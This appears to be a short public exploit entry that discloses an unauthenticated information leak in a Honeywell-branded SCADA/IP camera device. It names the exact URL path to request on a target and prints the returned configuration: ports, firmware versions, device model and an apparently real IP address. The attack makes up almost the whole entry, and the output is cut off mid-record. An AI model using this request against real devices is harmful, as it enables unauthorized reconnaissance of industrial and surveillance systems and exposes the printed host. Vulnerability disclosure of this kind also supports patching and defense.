# Exploit Title: Honeywell Scada System - Information Disclosure # Date: 2018-05-23 # Exploit Author: t4rkd3vilz # Vendor Homepage: https://www.honeywell.com # Version: WebVersion : 3.2.1.294365 - DeviceType : IPC-HFW2320R-ZS # Tested on: Linux # To be written after the destination IP address /web_caps/webCapsConfig # the downloaded file opens with the file name. The file contains # critical information about the destination address https://TargetIp/web_caps/webCapsConfig # Result: "Anonymous" : false, "DeviceSubClass" : "Unknown", "HttpPort" : { "InnerPort" : 80 }, "HttpsPort" : { "InnerPort" : 443 }, "NAS_Protocol_Mask" : 100, "PluginVersion" : "3.3.37.274972", "TCPPort" : 37777, "WebVersion" : "3.2.1.294365", "deviceType" : "IPC-HFW2320R-ZS", "eth0" : { "IPAddress" : "36.67.33.226", "IPv6Address" : "2001:250:3000:1::1:2"